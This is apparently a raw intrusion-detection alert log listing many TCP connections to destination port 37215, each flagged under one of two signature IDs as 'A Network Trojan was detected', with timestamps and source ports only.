          Timestamp:05/28/24-14:47:53.204754
          SID:2829579
          Source Port:51446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210299
          SID:2835222
          Source Port:51320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486750
          SID:2835222
          Source Port:48388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295056
          SID:2835222
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267048
          SID:2829579
          Source Port:56114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328482
          SID:2829579
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594429
          SID:2835222
          Source Port:53858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.429294
          SID:2835222
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962701
          SID:2835222
          Source Port:34968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116633
          SID:2829579
          Source Port:50730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075170
          SID:2835222
          Source Port:54744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817689
          SID:2829579
          Source Port:37270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594887
          SID:2829579
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987263
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922990
          SID:2829579
          Source Port:42000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.345798
          SID:2835222
          Source Port:60600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869134
          SID:2829579
          Source Port:39926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613944
          SID:2835222
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.365165
          SID:2835222
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095551
          SID:2829579
          Source Port:38908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473584
          SID:2829579
          Source Port:45742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.070380
          SID:2829579
          Source Port:41514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542984
          SID:2829579
          Source Port:57214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.888354
          SID:2829579
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207967
          SID:2835222
          Source Port:43104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849199
          SID:2835222
          Source Port:56866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114137
          SID:2835222
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.351113
          SID:2835222
          Source Port:51198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352546
          SID:2835222
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061138
          SID:2829579
          Source Port:41810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774855
          SID:2835222
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267099
          SID:2835222
          Source Port:47220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161383
          SID:2829579
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863292
          SID:2829579
          Source Port:60458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892650
          SID:2829579
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594515
          SID:2835222
          Source Port:44708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542368
          SID:2829579
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476806
          SID:2829579
          Source Port:39056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671973
          SID:2835222
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327768
          SID:2829579
          Source Port:42534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242876
          SID:2835222
          Source Port:58012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907851
          SID:2835222
          Source Port:50168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631778
          SID:2829579
          Source Port:35716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222802
          SID:2835222
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472309
          SID:2835222
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.555017
          SID:2835222
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668060
          SID:2835222
          Source Port:36578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143456
          SID:2835222
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664645
          SID:2835222
          Source Port:39096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618575
          SID:2835222
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892808
          SID:2829579
          Source Port:35378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265797
          SID:2835222
          Source Port:36246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176397
          SID:2829579
          Source Port:50076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797097
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810728
          SID:2835222
          Source Port:58506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961538
          SID:2835222
          Source Port:32864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975860
          SID:2829579
          Source Port:46172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591112
          SID:2835222
          Source Port:43706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890835
          SID:2829579
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330050
          SID:2835222
          Source Port:42728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600588
          SID:2835222
          Source Port:54436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814019
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528106
          SID:2829579
          Source Port:43910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552477
          SID:2835222
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322118
          SID:2829579
          Source Port:59334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220549
          SID:2835222
          Source Port:58576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268236
          SID:2835222
          Source Port:44696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922784
          SID:2829579
          Source Port:35772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.282021
          SID:2835222
          Source Port:34580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341801
          SID:2829579
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146009
          SID:2835222
          Source Port:36684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064565
          SID:2835222
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401632
          SID:2829579
          Source Port:42176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277620
          SID:2829579
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653033
          SID:2835222
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147401
          SID:2835222
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472438
          SID:2829579
          Source Port:49300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324663
          SID:2835222
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528224
          SID:2829579
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744370
          SID:2835222
          Source Port:46242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976349
          SID:2829579
          Source Port:46200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210657
          SID:2829579
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724530
          SID:2835222
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711159
          SID:2835222
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.280717
          SID:2835222
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987508
          SID:2835222
          Source Port:54420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462651
          SID:2835222
          Source Port:44766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681183
          SID:2829579
          Source Port:41412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.281930
          SID:2835222
          Source Port:53870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877688
          SID:2835222
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841235
          SID:2829579
          Source Port:38332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2835222
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088044
          SID:2829579
          Source Port:42906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705688
          SID:2835222
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145693
          SID:2835222
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301341
          SID:2829579
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483906
          SID:2835222
          Source Port:40870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.915191
          SID:2835222
          Source Port:58580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214493
          SID:2835222
          Source Port:50202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154587
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334323
          SID:2829579
          Source Port:38182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.169883
          SID:2835222
          Source Port:58430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066577
          SID:2835222
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710264
          SID:2835222
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809005
          SID:2835222
          Source Port:57358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.130704
          SID:2835222
          Source Port:37332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465232
          SID:2829579
          Source Port:49722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241958
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369127
          SID:2835222
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728497
          SID:2835222
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529075
          SID:2835222
          Source Port:53136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804896
          SID:2829579
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698599
          SID:2829579
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084342
          SID:2829579
          Source Port:40162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160556
          SID:2829579
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.318898
          SID:2835222
          Source Port:38870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744529
          SID:2829579
          Source Port:42210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744723
          SID:2829579
          Source Port:47906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065329
          SID:2835222
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304255
          SID:2829579
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551265
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.037249
          SID:2829579
          Source Port:43342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627438
          SID:2829579
          Source Port:46842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939284
          SID:2835222
          Source Port:45224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.736729
          SID:2829579
          Source Port:57380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205623
          SID:2835222
          Source Port:46870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794930
          SID:2829579
          Source Port:40092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840071
          SID:2835222
          Source Port:54532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463498
          SID:2829579
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664468
          SID:2829579
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685055
          SID:2835222
          Source Port:33612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435449
          SID:2829579
          Source Port:45982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379287
          SID:2829579
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466561
          SID:2829579
          Source Port:50976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665648
          SID:2829579
          Source Port:40098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039107
          SID:2829579
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868400
          SID:2835222
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922871
          SID:2829579
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978888
          SID:2829579
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355874
          SID:2829579
          Source Port:49072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441427
          SID:2829579
          Source Port:56818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943269
          SID:2835222
          Source Port:51198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273226
          SID:2835222
          Source Port:44478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235431
          SID:2829579
          Source Port:53512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.810801
          SID:2835222
          Source Port:49282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267751
          SID:2835222
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369432
          SID:2835222
          Source Port:44654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974035
          SID:2829579
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729521
          SID:2829579
          Source Port:60782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978237
          SID:2829579
          Source Port:59920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922913
          SID:2829579
          Source Port:52686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528351
          SID:2829579
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538572
          SID:2835222
          Source Port:51194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142487
          SID:2829579
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535722
          SID:2829579
          Source Port:52406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178530
          SID:2829579
          Source Port:59788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930479
          SID:2829579
          Source Port:33068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478224
          SID:2835222
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957916
          SID:2835222
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401605
          SID:2829579
          Source Port:38580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337480
          SID:2835222
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126658
          SID:2829579
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708477
          SID:2835222
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290316
          SID:2835222
          Source Port:37252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300650
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964990
          SID:2835222
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782468
          SID:2829579
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890319
          SID:2829579
          Source Port:45478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744623
          SID:2829579
          Source Port:54810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812354
          SID:2829579
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970243
          SID:2835222
          Source Port:33264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272264
          SID:2829579
          Source Port:45228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399699
          SID:2829579
          Source Port:42512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796352
          SID:2835222
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232902
          SID:2835222
          Source Port:43878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728033
          SID:2829579
          Source Port:35948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712099
          SID:2835222
          Source Port:37392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782266
          SID:2829579
          Source Port:56382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102960
          SID:2835222
          Source Port:37232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400745
          SID:2835222
          Source Port:39794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426024
          SID:2835222
          Source Port:48714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268320
          SID:2829579
          Source Port:37306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743307
          SID:2829579
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.378945
          SID:2829579
          Source Port:38470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247799
          SID:2835222
          Source Port:34156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046074
          SID:2835222
          Source Port:35722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893992
          SID:2829579
          Source Port:58968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822896
          SID:2829579
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464033
          SID:2835222
          Source Port:38762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861008
          SID:2835222
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186027
          SID:2835222
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806614
          SID:2829579
          Source Port:45016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764080
          SID:2835222
          Source Port:59218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160173
          SID:2835222
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197353
          SID:2829579
          Source Port:49938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.533111
          SID:2835222
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805168
          SID:2835222
          Source Port:50318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125858
